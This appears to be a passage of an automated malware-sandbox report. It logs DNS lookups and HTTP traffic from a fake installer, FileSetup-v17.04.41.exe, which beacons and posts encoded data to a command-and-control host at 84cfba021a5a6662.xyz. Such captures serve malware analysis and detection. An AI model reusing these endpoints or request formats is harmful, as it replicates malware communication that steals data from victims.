                                                                                                                                              Jan 29, 2021 10:57:53.872057915 CET192.168.2.38.8.8.80xabd0Standard query (0)84cfba021a5a6662.xyzA (IP address)IN (0x0001)
                                                                                                                                              Jan 29, 2021 10:57:54.856245041 CET192.168.2.38.8.8.80xae4fStandard query (0)84cfba021a5a6662.xyzA (IP address)IN (0x0001)
                                                                                                                                              Jan 29, 2021 10:58:49.066128969 CET192.168.2.38.8.8.80x7e9fStandard query (0)84CFBA021A5A6662.xyzA (IP address)IN (0x0001)

                                                                                                                                              DNS Answers

                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                              Jan 29, 2021 10:57:39.214333057 CET8.8.8.8192.168.2.30xbbc6No error (0)84cfba021a5a6662.xyz104.21.23.16A (IP address)IN (0x0001)
                                                                                                                                              Jan 29, 2021 10:57:39.214333057 CET8.8.8.8192.168.2.30xbbc6No error (0)84cfba021a5a6662.xyz172.67.208.74A (IP address)IN (0x0001)
                                                                                                                                              Jan 29, 2021 10:57:53.928330898 CET8.8.8.8192.168.2.30xabd0No error (0)84cfba021a5a6662.xyz104.21.23.16A (IP address)IN (0x0001)
                                                                                                                                              Jan 29, 2021 10:57:53.928330898 CET8.8.8.8192.168.2.30xabd0No error (0)84cfba021a5a6662.xyz172.67.208.74A (IP address)IN (0x0001)
                                                                                                                                              Jan 29, 2021 10:57:54.918409109 CET8.8.8.8192.168.2.30xae4fNo error (0)84cfba021a5a6662.xyz104.21.23.16A (IP address)IN (0x0001)
                                                                                                                                              Jan 29, 2021 10:57:54.918409109 CET8.8.8.8192.168.2.30xae4fNo error (0)84cfba021a5a6662.xyz172.67.208.74A (IP address)IN (0x0001)
                                                                                                                                              Jan 29, 2021 10:58:49.123408079 CET8.8.8.8192.168.2.30x7e9fNo error (0)84CFBA021A5A6662.xyz104.21.23.16A (IP address)IN (0x0001)
                                                                                                                                              Jan 29, 2021 10:58:49.123408079 CET8.8.8.8192.168.2.30x7e9fNo error (0)84CFBA021A5A6662.xyz172.67.208.74A (IP address)IN (0x0001)

                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                              • 84cfba021a5a6662.xyz

                                                                                                                                              HTTP Packets

                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                              0192.168.2.349725104.21.23.1680C:\Users\user\Desktop\FileSetup-v17.04.41.exe
                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                              Jan 29, 2021 10:57:39.274213076 CET107OUTPOST //fine/send HTTP/1.1
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Pragma: no-cache
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                              Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                              upgrade-insecure-requests: 1
                                                                                                                                              Content-Length: 84
                                                                                                                                              Host: 84cfba021a5a6662.xyz
                                                                                                                                              Jan 29, 2021 10:57:39.274293900 CET107OUTData Raw: 74 79 70 65 3d 69 6e 73 74 61 6c 6c 26 73 65 6c 6c 65 72 3d 69 6e 73 74 61 6c 6c 70 33 26 70 72 69 63 65 3d 2d 30 2e 33 26 67 75 69 64 3d 35 30 31 34 46 46 42 35 37 45 36 44 45 44 41 33 26 76 65 72 3d 34 36 2e 30 2e 30 26 6f 72 69 67 69 6e 3d 65
                                                                                                                                              Data Ascii: type=install&seller=installp3&price=-0.3&guid=5014FFB57E6DEDA3&ver=46.0.0&origin=exe
                                                                                                                                              Jan 29, 2021 10:57:39.961137056 CET118INHTTP/1.1 200 OK
                                                                                                                                              Date: Fri, 29 Jan 2021 09:57:39 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Set-Cookie: __cfduid=dcd5867eff6278b419fd878640dc80da71611914259; expires=Sun, 28-Feb-21 09:57:39 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                              cf-request-id: 07ef2cc36e00000c25ae1a7000000001
                                                                                                                                              Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=owKbgFiPy568IFUYqlzyW5C9zX5ixZkzRw2Ny%2FxG6CC18mqnycq5gwIOG3mfGcKiUf8oKWJz822fmlkufnxnDmwXaXSg0UFF2FtehpzhFp1oGUbYLg%3D%3D"}],"group":"cf-nel"}
                                                                                                                                              NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 61921718a9eb0c25-AMS
                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0
                                                                                                                                              Jan 29, 2021 10:57:39.976404905 CET119OUTPOST /info_old/w HTTP/1.1
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Pragma: no-cache
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                              Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                              upgrade-insecure-requests: 1
                                                                                                                                              Content-Length: 93
                                                                                                                                              Host: 84cfba021a5a6662.xyz
                                                                                                                                              Jan 29, 2021 10:57:39.976480961 CET119OUTData Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 79 6e 63 69 79 70 37 68 48 64 42 6c 4c 31 36 79 66 77 37 6f 53 30 43 43 71 79 6c 57 5a 4a 53 4e 4c 51 4a 43 59 66 76 42 67 4b 77 66 43 34 4d 6d 78 65 6f 75 42 36 59 55 39 41 58 6c 30 34 51 4d 37 4d 7a
                                                                                                                                              Data Ascii: info=4u25ymXISBynciyp7hHdBlL16yfw7oS0CCqylWZJSNLQJCYfvBgKwfC4MmxeouB6YU9AXl04QM7MzC4zd7fupg~~
                                                                                                                                              Jan 29, 2021 10:57:41.399874926 CET126INHTTP/1.1 200 OK
                                                                                                                                              Date: Fri, 29 Jan 2021 09:57:41 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Set-Cookie: __cfduid=db3cecb1faef337e8ee8acd50f99f8b4e1611914260; expires=Sun, 28-Feb-21 09:57:40 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                              cf-request-id: 07ef2cc62c00000c25d989d000000001
                                                                                                                                              Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=R5gGxqqdket0bLDx9VZxg6FznStJe8BokGLb%2BEn4c7WhLRiPcw8By4EEZFhOGdjZbpYuNRK%2F3G2kMD6AowlzFHW5vv%2BaJD%2F00afruZTl8Lk%2B93DVIA%3D%3D"}],"group":"cf-nel"}
                                                                                                                                              NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 6192171d1da50c25-AMS
                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0
                                                                                                                                              Jan 29, 2021 10:57:41.489664078 CET129OUTPOST /info_old/w HTTP/1.1
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Pragma: no-cache
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                              Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                              upgrade-insecure-requests: 1
                                                                                                                                              Content-Length: 93
                                                                                                                                              Host: 84cfba021a5a6662.xyz
                                                                                                                                              Jan 29, 2021 10:57:41.489733934 CET130OUTData Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 79 6e 63 69 79 70 37 68 48 64 42 6c 4c 31 36 79 66 77 37 6f 53 30 43 43 71 79 6c 57 5a 4a 53 4e 4c 51 4a 43 59 66 76 42 67 4b 77 51 67 42 36 51 6e 2d 32 54 51 62 4e 73 52 42 4a 62 66 74 68 5a 32 4c 44
                                                                                                                                              Data Ascii: info=4u25ymXISBynciyp7hHdBlL16yfw7oS0CCqylWZJSNLQJCYfvBgKwQgB6Qn-2TQbNsRBJbfthZ2LDs3NzMbcYA~~
                                                                                                                                              Jan 29, 2021 10:57:44.276484966 CET156INHTTP/1.1 200 OK
                                                                                                                                              Date: Fri, 29 Jan 2021 09:57:44 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Set-Cookie: __cfduid=d6ea9ef90a7c3fd89f2bb7d01119a1f791611914261; expires=Sun, 28-Feb-21 09:57:41 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                              cf-request-id: 07ef2ccc1500000c2504afc000000001
                                                                                                                                              Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=6gFIOjEUaqpru2TjB39K7Ekfaq8XH2apH7NJZEcHGb%2BuID3NQ3hvh83hoexqDLNWM93dEh%2FCjkyF3Zc3VZLyJWPH2SLLXBOGH6uWyAePNmYDPR%2FhDA%3D%3D"}],"group":"cf-nel"}
                                                                                                                                              NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 619217268cbf0c25-AMS
                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0
                                                                                                                                              Jan 29, 2021 10:57:46.477119923 CET162OUTPOST /info_old/w HTTP/1.1
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Pragma: no-cache
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                              Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                              upgrade-insecure-requests: 1
                                                                                                                                              Content-Length: 93
                                                                                                                                              Host: 84cfba021a5a6662.xyz
                                                                                                                                              Jan 29, 2021 10:57:46.477178097 CET162OUTData Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 79 6e 63 69 79 70 37 68 48 64 42 6c 4c 31 36 79 66 77 37 6f 53 30 43 43 71 79 6c 57 5a 4a 53 4e 4c 51 4a 43 59 66 76 42 67 4b 77 66 43 34 4d 6d 78 65 6f 75 42 36 37 4e 53 55 63 6d 52 79 30 63 6c 52 4a
                                                                                                                                              Data Ascii: info=4u25ymXISBynciyp7hHdBlL16yfw7oS0CCqylWZJSNLQJCYfvBgKwfC4MmxeouB67NSUcmRy0clRJIN3FaDyew~~
                                                                                                                                              Jan 29, 2021 10:57:50.713327885 CET163INHTTP/1.1 200 OK
                                                                                                                                              Date: Fri, 29 Jan 2021 09:57:50 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Set-Cookie: __cfduid=d7b376252b991b256fff07790d731cb8b1611914266; expires=Sun, 28-Feb-21 09:57:46 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                              cf-request-id: 07ef2cdf9300000c25c3a27000000001
                                                                                                                                              Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=M7fA%2BXqzQohGspvLdIHbK5VYQcnz9ZkeRixG1IkuRGbQTwGIycTUkwiAVpRLlC%2BQ9u6oVcAyS868J3i4MCSzTWyX9uzQKqId%2Bg3bkOM8mLZnZhEXKQ%3D%3D"}],"group":"cf-nel"}
                                                                                                                                              NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 61921745bf710c25-AMS
                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                              1192.168.2.349730104.21.23.1680C:\Users\user\Desktop\FileSetup-v17.04.41.exe
                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                              Jan 29, 2021 10:57:53.984832048 CET164OUTPOST /info_old/w HTTP/1.1
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Pragma: no-cache
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                              Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                              upgrade-insecure-requests: 1
                                                                                                                                              Content-Length: 81
                                                                                                                                              Host: 84cfba021a5a6662.xyz
                                                                                                                                              Jan 29, 2021 10:57:53.984879017 CET164OUTData Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 79 6e 63 69 79 70 37 68 48 64 42 6c 4c 31 36 79 66 77 37 6f 53 30 43 43 71 79 6c 57 5a 4a 53 4e 4c 51 4a 43 59 66 76 42 67 4b 77 54 36 50 4c 5f 4a 46 63 65 4f 4e 6c 70 4d 53 36 63 69 50 56 4a 55 7e
                                                                                                                                              Data Ascii: info=4u25ymXISBynciyp7hHdBlL16yfw7oS0CCqylWZJSNLQJCYfvBgKwT6PL_JFceONlpMS6ciPVJU~
                                                                                                                                              Jan 29, 2021 10:57:58.149625063 CET176INHTTP/1.1 200 OK
                                                                                                                                              Date: Fri, 29 Jan 2021 09:57:58 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Set-Cookie: __cfduid=d9e369f6c99215b0d17e70a31fffcf7931611914274; expires=Sun, 28-Feb-21 09:57:54 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                              cf-request-id: 07ef2cfce400004c616f24a000000001
                                                                                                                                              Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Opu6pZqmp0PKWqKnTyD4A1NUg6q6S4Q3OM9O09FBNm%2FwfgLvssO4gtOQqsav8STl%2Fi6OEAjFAPxg29mgOAdV8cbggfyNy47spKCalU%2FcrJ0RLRuSXA%3D%3D"}],"group":"cf-nel"}
                                                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 61921774a9384c61-AMS
                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0
                                                                                                                                              Jan 29, 2021 10:58:07.034818888 CET275OUTPOST /info_old/e HTTP/1.1
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Pragma: no-cache
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                              Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                              upgrade-insecure-requests: 1
                                                                                                                                              Content-Length: 677
                                                                                                                                              Host: 84cfba021a5a6662.xyz
                                                                                                                                              Jan 29, 2021 10:58:07.034873962 CET276OUTData Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 7a 6c 35 2d 55 57 4f 59 52 6d 51 30 33 71 49 4f 6a 4e 6a 67 64 56 44 64 79 51 39 79 39 62 4e 42 46 4f 4b 58 78 76 53 37 45 4e 6e 58 6d 67 6b 68 31 37 44 51 72 77 6a 69 51 42 39 6a 33 50 66 6c 35 5f 6a
                                                                                                                                              Data Ascii: info=4u25ymXISBzl5-UWOYRmQ03qIOjNjgdVDdyQ9y9bNBFOKXxvS7ENnXmgkh17DQrwjiQB9j3Pfl5_j53G2ZkUjQM1Fgo6r0jMO7leiY9oVM77olzx6aSF71wth7Z8ypVDs3XGzhTIJz9Ln0J-vVtxEq7lfjLdx5MPBU1A6qVTl-8scn_weQtC8W9ZKFI2fZRdHu8haZovnFMOlLlxTLodSbo4FI9rEiPmgP90FCGtJHAUAp
                                                                                                                                              Jan 29, 2021 10:58:08.430646896 CET278INHTTP/1.1 200 OK
                                                                                                                                              Date: Fri, 29 Jan 2021 09:58:08 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Set-Cookie: __cfduid=daa0e19361d0474b2299fe6b65a91e7c51611914287; expires=Sun, 28-Feb-21 09:58:07 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                              cf-request-id: 07ef2d2fde00004c617387d000000001
                                                                                                                                              Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=KEjjwmrAp9Kln6OaOCOw4HCAPa2vcPeYzEN3M2%2BF7Eo9l%2FQ3L419HZpo52K45DJlWWXjFG7e9X8YaRmzFbmSEJrrotzIhqm%2FSHaOLDH%2FIQgsb3G35w%3D%3D"}],"group":"cf-nel"}
                                                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 619217c63cfe4c61-AMS
                                                                                                                                              Data Raw: 31 0d 0a 31 0d 0a
                                                                                                                                              Data Ascii: 11
                                                                                                                                              Jan 29, 2021 10:58:08.430690050 CET278INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0
                                                                                                                                              Jan 29, 2021 10:58:08.452989101 CET278OUTPOST /info_old/w HTTP/1.1
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Pragma: no-cache
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                              Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                              upgrade-insecure-requests: 1
                                                                                                                                              Content-Length: 81
                                                                                                                                              Host: 84cfba021a5a6662.xyz
                                                                                                                                              Jan 29, 2021 10:58:08.453020096 CET278OUTData Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 79 6e 63 69 79 70 37 68 48 64 42 6c 4c 31 36 79 66 77 37 6f 53 30 43 43 71 79 6c 57 5a 4a 53 4e 4c 51 4a 43 59 66 76 42 67 4b 77 65 53 52 47 70 7a 37 61 53 72 65 66 69 64 71 63 73 38 62 73 51 4d 7e
                                                                                                                                              Data Ascii: info=4u25ymXISBynciyp7hHdBlL16yfw7oS0CCqylWZJSNLQJCYfvBgKweSRGpz7aSrefidqcs8bsQM~
                                                                                                                                              Jan 29, 2021 10:58:14.426819086 CET474INHTTP/1.1 200 OK
                                                                                                                                              Date: Fri, 29 Jan 2021 09:58:14 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Set-Cookie: __cfduid=d32fdfb63199d4edc23fbae53552b02111611914288; expires=Sun, 28-Feb-21 09:58:08 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                              cf-request-id: 07ef2d356900004c61660aa000000001
                                                                                                                                              Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=1K9EG0%2FwVBwf8mM3dZB%2FUrCgGXdoa7nI%2BtUY9I4vVkaQ0z2CC4yppRSWRVLlQzW3LFSor6Pj8OfdGox2%2FQn4GYKzVFnjMNYQH0Y%2BjXRW3wHd2YiXdA%3D%3D"}],"group":"cf-nel"}
                                                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 619217cf0f154c61-AMS
                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0
                                                                                                                                              Jan 29, 2021 10:58:14.787164927 CET475OUTPOST /info_old/g HTTP/1.1
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Pragma: no-cache
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                              Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                              upgrade-insecure-requests: 1
                                                                                                                                              Content-Length: 1405
                                                                                                                                              Host: 84cfba021a5a6662.xyz
                                                                                                                                              Jan 29, 2021 10:58:14.787204027 CET476OUTData Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 7a 6c 35 2d 55 57 4f 59 52 6d 51 30 33 71 49 4f 6a 4e 6a 67 64 56 44 64 79 51 39 79 39 62 4e 42 46 4f 4b 58 78 76 53 37 45 4e 6e 58 6d 67 6b 68 31 37 44 51 72 77 6a 69 51 42 39 6a 33 50 66 6c 35 5f 6a
                                                                                                                                              Data Ascii: info=4u25ymXISBzl5-UWOYRmQ03qIOjNjgdVDdyQ9y9bNBFOKXxvS7ENnXmgkh17DQrwjiQB9j3Pfl5_j53G2ZkUjQM1Fgo6r0jMO7leiY9oVM5Vwz1ScmteJDE7w10psZ_00qMctjeo9yHIdrimRhlTyqoq04YBQNY38-9gvcqKkwKC2J2Vfvi-G14KPQvG-1i6sWAfJLJ64NhtuEoHoC_r48CvN7Q4vs-izMqS79aOTgkOPi
                                                                                                                                              Jan 29, 2021 10:58:16.177582979 CET477INHTTP/1.1 200 OK
                                                                                                                                              Date: Fri, 29 Jan 2021 09:58:16 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Set-Cookie: __cfduid=d0735860e1690b2ce5099884fb2722c3c1611914294; expires=Sun, 28-Feb-21 09:58:14 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                              cf-request-id: 07ef2d4e2800004c618f0d1000000001
                                                                                                                                              Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=hp5Lw2GXSaX376m6zOC78rDpbceeERcTYw8vJ12Yamvzk9QHk1awWh1dFPQ7aGk0eg2bC7b0ca0IRPBCanUSjVskDQcIdeQVU2DIxPcDK9kbpp3%2FSQ%3D%3D"}],"group":"cf-nel"}
                                                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 619217f6aecf4c61-AMS
                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0
                                                                                                                                              Jan 29, 2021 10:58:16.211626053 CET478OUTPOST /info_old/w HTTP/1.1
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Pragma: no-cache
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                              Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                              upgrade-insecure-requests: 1
                                                                                                                                              Content-Length: 81
                                                                                                                                              Host: 84cfba021a5a6662.xyz
                                                                                                                                              Jan 29, 2021 10:58:16.211760998 CET478OUTData Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 79 6e 63 69 79 70 37 68 48 64 42 6c 4c 31 36 79 66 77 37 6f 53 30 43 43 71 79 6c 57 5a 4a 53 4e 4c 51 4a 43 59 66 76 42 67 4b 77 58 61 32 75 79 39 70 59 70 4d 62 41 5a 36 54 49 59 2d 75 79 51 59 7e
                                                                                                                                              Data Ascii: info=4u25ymXISBynciyp7hHdBlL16yfw7oS0CCqylWZJSNLQJCYfvBgKwXa2uy9pYpMbAZ6TIY-uyQY~
                                                                                                                                              Jan 29, 2021 10:58:20.519503117 CET505INHTTP/1.1 200 OK
                                                                                                                                              Date: Fri, 29 Jan 2021 09:58:20 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Set-Cookie: __cfduid=dca96338e8c36fc4bd98a59d252997faf1611914296; expires=Sun, 28-Feb-21 09:58:16 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                              cf-request-id: 07ef2d53ba00004c616db60000000001
                                                                                                                                              Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=TNxb7U72LVZloZomDxQl6JoVFNJA%2BBbYJjmE%2BmWM2%2FLtcIJZOwG2cM1BL4vHYxP1lPQ7Y%2F37Uf%2BdH5CZhNWzknzKjJBqD609GbF80ruVYhDMh1rrwA%3D%3D"}],"group":"cf-nel"}
                                                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 619217ff8ca54c61-AMS
                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0
                                                                                                                                              Jan 29, 2021 10:58:20.522950888 CET506OUTGET /info_old/r HTTP/1.1
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Pragma: no-cache
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                              Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                              upgrade-insecure-requests: 1
                                                                                                                                              Host: 84cfba021a5a6662.xyz
                                                                                                                                              Jan 29, 2021 10:58:21.874977112 CET553INHTTP/1.1 200 OK
